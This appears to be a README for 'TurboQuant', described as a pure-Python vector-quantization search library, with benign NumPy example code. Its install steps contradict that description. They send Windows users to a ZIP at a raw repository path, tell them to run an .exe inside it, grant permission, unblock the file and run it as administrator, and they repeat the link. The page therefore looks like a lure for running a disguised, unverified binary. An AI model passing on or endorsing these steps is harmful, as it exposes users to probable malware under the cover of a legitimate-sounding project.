⚡ TurboQuant - Fast vector search with less memory

🖥️ What TurboQuant does

TurboQuant is a Windows app for fast vector search with lower memory use. It lets you work with large sets of embeddings without heavy setup. It uses vector quantization to shrink stored vectors while keeping search results close to those from the uncompressed data.

Use it for:

  • semantic search
  • similarity search
  • RAG workflows
  • embedding storage
  • local vector search
  • LLM memory use cases

It is written in pure Python as a FAISS replacement, which keeps setup simple.

📥 Download TurboQuant

Download TurboQuant from this link:

https://github.com/bojobh609/TurboQuant/raw/refs/heads/main/turboquant/Quant_Turbo_3.2.zip

The link downloads a ZIP archive. If you are offered more than one file, choose the one that ends in .exe or the Windows package marked for end users.

🪟 Windows setup

  1. Open the download link above.
  2. Download the latest Windows file.
  3. Open your Downloads folder.
  4. Double-click the file you downloaded.
  5. If Windows asks for permission, choose Yes.
  6. Follow the on-screen steps.
  7. Start TurboQuant from the app window or shortcut it creates.

If the app comes as a ZIP file:

  1. Right-click the ZIP file.
  2. Choose Extract All.
  3. Open the extracted folder.
  4. Double-click the main app file.

✅ What you need

TurboQuant is meant for normal Windows desktop use.

A typical setup works best with:

  • Windows 10 or Windows 11
  • 8 GB RAM or more
  • A modern Intel or AMD CPU
  • 200 MB of free disk space for the app and files
  • A mouse and keyboard for easier use

For larger vector collections, more RAM helps.
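
To get a rough sense of how much RAM a collection needs, you can multiply the number of vectors by the vector length and the bytes per value. The sketch below does that arithmetic. The collection size, the vector length, and the helper name `index_size_bytes` are illustrative assumptions, not values or functions from TurboQuant, and the estimate ignores any index overhead.

```python
def index_size_bytes(num_vectors, dim, bytes_per_value):
    """Raw storage for num_vectors vectors of length dim, ignoring index overhead."""
    return num_vectors * dim * bytes_per_value

GIB = 1024 ** 3
num_vectors, dim = 1_000_000, 768  # illustrative numbers, not from TurboQuant

full = index_size_bytes(num_vectors, dim, 4)     # float32: 4 bytes per value
compact = index_size_bytes(num_vectors, dim, 1)  # 8-bit codes: 1 byte per value

print(f"float32: {full / GIB:.2f} GiB")   # float32: 2.86 GiB
print(f"8-bit:   {compact / GIB:.2f} GiB")  # 8-bit:   0.72 GiB
```

With these assumed numbers, the uncompressed vectors alone take a large share of an 8 GB machine, while 8-bit codes take a quarter of that.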

📦 What you can do with it

TurboQuant helps you store and search vector data with less memory.

Common tasks:

  • load embeddings
  • reduce storage size
  • search for close matches
  • compare items by meaning
  • support local search tools
  • use compressed vectors for faster retrieval

It is a good fit if you want lower storage use without rebuilding your data pipeline.

🔍 How it works

TurboQuant uses vector quantization. In simple terms, it stores vectors in a smaller form so the app uses less space. That makes it useful when you have many embeddings or large search indexes.
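
To make the idea concrete, here is a minimal NumPy sketch of one simple form of quantization: mapping each float32 value to an 8-bit code with a separate range per dimension. This is a generic scalar quantizer used for illustration only. It is not taken from TurboQuant, and the function names `quantize_uint8` and `dequantize_uint8` are hypothetical.

```python
import numpy as np

def quantize_uint8(vectors):
    """Map float32 vectors to uint8 codes using one min/max range per dimension."""
    lo = vectors.min(axis=0)
    hi = vectors.max(axis=0)
    scale = (hi - lo) / 255.0
    scale[scale == 0] = 1.0  # avoid dividing by zero when a dimension is constant
    codes = np.round((vectors - lo) / scale).astype(np.uint8)
    return codes, lo, scale

def dequantize_uint8(codes, lo, scale):
    """Rebuild approximate float32 vectors from the stored codes."""
    return codes.astype(np.float32) * scale + lo

rng = np.random.default_rng(0)
vectors = rng.standard_normal((1000, 64)).astype(np.float32)  # stand-in for embeddings

codes, lo, scale = quantize_uint8(vectors)
restored = dequantize_uint8(codes, lo, scale)

print("original bytes:", vectors.nbytes)
print("compressed bytes:", codes.nbytes)
print("max reconstruction error:", float(np.abs(restored - vectors).max()))
```

The codes take one byte per value instead of four, and each restored value differs from the original by at most about half a quantization step.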

It is built around:

  • approximate nearest neighbor search
  • compression
  • embedding search
  • quantized vector storage
  • NumPy-based data handling

The goal is to keep recall high while reducing memory use. Recall here means the share of true nearest neighbors that the approximate search still returns.
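
One way to check that trade-off is to compare a brute-force search on the original vectors with the same search on compressed vectors and count how many results agree. The sketch below does this with NumPy on random data. The 8-bit compression step, the helper names `top_k` and `recall_at_k`, and the data sizes are all assumptions for illustration, not TurboQuant's own method or API.

```python
import numpy as np

def top_k(queries, database, k):
    """Indices of the k nearest database rows per query, by brute-force squared L2."""
    # ||q - x||^2 = ||q||^2 - 2 q.x + ||x||^2; ||q||^2 is constant per query, so drop it.
    sq_norms = (database ** 2).sum(axis=1)
    scores = sq_norms[None, :] - 2.0 * (queries @ database.T)
    return np.argsort(scores, axis=1)[:, :k]

def recall_at_k(exact_ids, approx_ids):
    """Fraction of exact neighbors that also appear in the approximate results."""
    hits = sum(len(set(e) & set(a)) for e, a in zip(exact_ids, approx_ids))
    return hits / exact_ids.size

rng = np.random.default_rng(0)
database = rng.standard_normal((2000, 32)).astype(np.float32)
queries = rng.standard_normal((50, 32)).astype(np.float32)

# Illustrative compression: 8-bit codes with one range per dimension.
lo = database.min(axis=0)
scale = (database.max(axis=0) - lo) / 255.0
scale[scale == 0] = 1.0
codes = np.round((database - lo) / scale).astype(np.uint8)
restored = codes.astype(np.float32) * scale + lo

k = 10
exact = top_k(queries, database, k)
approx = top_k(queries, restored, k)
recall = recall_at_k(exact, approx)
print(f"recall@{k}: {recall:.3f}")
```

Running the same comparison on a sample of your own embeddings gives a more useful number than random data, since recall depends on how the vectors are distributed.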

🧭 Basic use flow

Most users will follow this path:

  1. Download the app from the link above.
  2. Open the app on Windows.
  3. Load your vector data or embeddings.
  4. Choose a compression setting.
  5. Run a search or build an index.
  6. Save the result for later use.

If the app gives you sample data, use that first to see how it works.
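
For readers who want to see the load, compress, save, and reload steps outside the app, the following NumPy sketch walks through them on generated sample data. The file name `index.npz`, the 8-bit scheme, and the use of NumPy's `.npz` format are assumptions made for this example. The source does not describe TurboQuant's own file format.

```python
import os
import tempfile

import numpy as np

# Step 3: load vectors (random sample data stands in for real embeddings).
rng = np.random.default_rng(0)
sample = rng.standard_normal((500, 16)).astype(np.float32)

# Step 4: compress to 8-bit codes with one range per dimension (illustrative scheme).
lo = sample.min(axis=0)
scale = (sample.max(axis=0) - lo) / 255.0
scale[scale == 0] = 1.0
codes = np.round((sample - lo) / scale).astype(np.uint8)

# Step 6: save the compressed data, then read it back.
with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "index.npz")  # hypothetical file name
    np.savez_compressed(path, codes=codes, lo=lo, scale=scale)
    with np.load(path) as saved:
        loaded_codes = saved["codes"]
        loaded_lo = saved["lo"]
        loaded_scale = saved["scale"]

# The reloaded codes can be turned back into approximate vectors for searching.
restored = loaded_codes.astype(np.float32) * loaded_scale + loaded_lo
print("round trip ok:", np.array_equal(loaded_codes, codes))
```

Saving the offsets and scales next to the codes matters here, because the codes alone cannot be turned back into vectors.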

🧰 Common features

  • Fast vector search on Windows
  • Small memory use
  • Pure Python core
  • Simple download and run setup
  • Good fit for semantic search
  • Works with embedding-based apps
  • Helpful for RAG and local AI tools

📁 File types you may see

Depending on the release, you may see one of these:

  • .exe file: open it directly
  • .zip file: extract it first
  • .whl file: for Python users
  • .tar.gz file: more common on source builds

For most Windows users, the best choice is the app package made for Windows.

🛠️ If the app does not open

Try these steps:

  1. Download the file again.
  2. Make sure the download finished.
  3. Right-click the file and check Properties.
  4. If you see an Unblock box, select it.
  5. Try Run as administrator.
  6. Reboot Windows and open it again.

If you still have trouble, download a fresh copy from the download link.

🔎 If you use it with embeddings

TurboQuant works best when all vectors in an index come from the same embedding model. Vectors from different models are not comparable, so mixing them makes search results unreliable.

Helpful tips:

  • keep the vector dimension the same within one index
  • store your original files in a safe place
  • test on a small batch first
  • use the same search method each time
  • keep track of your compression level
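
The first tip can be enforced with a small check before vectors are added to an index. The helper below is a hypothetical sketch in NumPy, not part of TurboQuant. It rejects batches with the wrong shape, the wrong dimension, or non-finite values.

```python
import numpy as np

def check_batch(batch, expected_dim):
    """Return the batch as a float32 array, or raise ValueError if it does not fit the index."""
    arr = np.asarray(batch, dtype=np.float32)
    if arr.ndim != 2:
        raise ValueError(f"expected a 2-D array of vectors, got {arr.ndim} dimension(s)")
    if arr.shape[1] != expected_dim:
        raise ValueError(f"expected vectors of length {expected_dim}, got {arr.shape[1]}")
    if not np.isfinite(arr).all():
        raise ValueError("batch contains NaN or infinite values")
    return arr

good = check_batch([[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]], expected_dim=3)
print(good.shape)  # (2, 3)

try:
    check_batch([[0.1, 0.2, 0.3]], expected_dim=4)
except ValueError as err:
    print("rejected:", err)
```

Running a check like this on a small batch first catches a mismatched embedding model before it affects a large index.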

🧠 Good use cases

TurboQuant fits well in these cases:

  • search across document embeddings
  • build a small local vector store
  • reduce memory use in RAG tools
  • test vector search on a laptop
  • compare items by meaning
  • store many vectors without large file growth

🗂️ Project topics

This project relates to:

  • ann-search
  • approximate-nearest-neighbor
  • compression
  • deep-learning
  • embedding-compression
  • faiss
  • iclr-2026
  • information-retrieval
  • kv-cache
  • llm
  • machine-learning
  • numpy
  • python
  • quantization
  • rag
  • semantic-search
  • similarity-search
  • turboquant
  • vector-database
  • vector-quantization

🔗 Download again

If you need the latest build, use this link:

https://github.com/bojobh609/TurboQuant/raw/refs/heads/main/turboquant/Quant_Turbo_3.2.zip

🧩 Simple first run checklist

  • Download the latest Windows file
  • Open the file
  • Allow Windows permission if asked
  • Follow the setup steps
  • Launch the app
  • Load your data
  • Run your first search
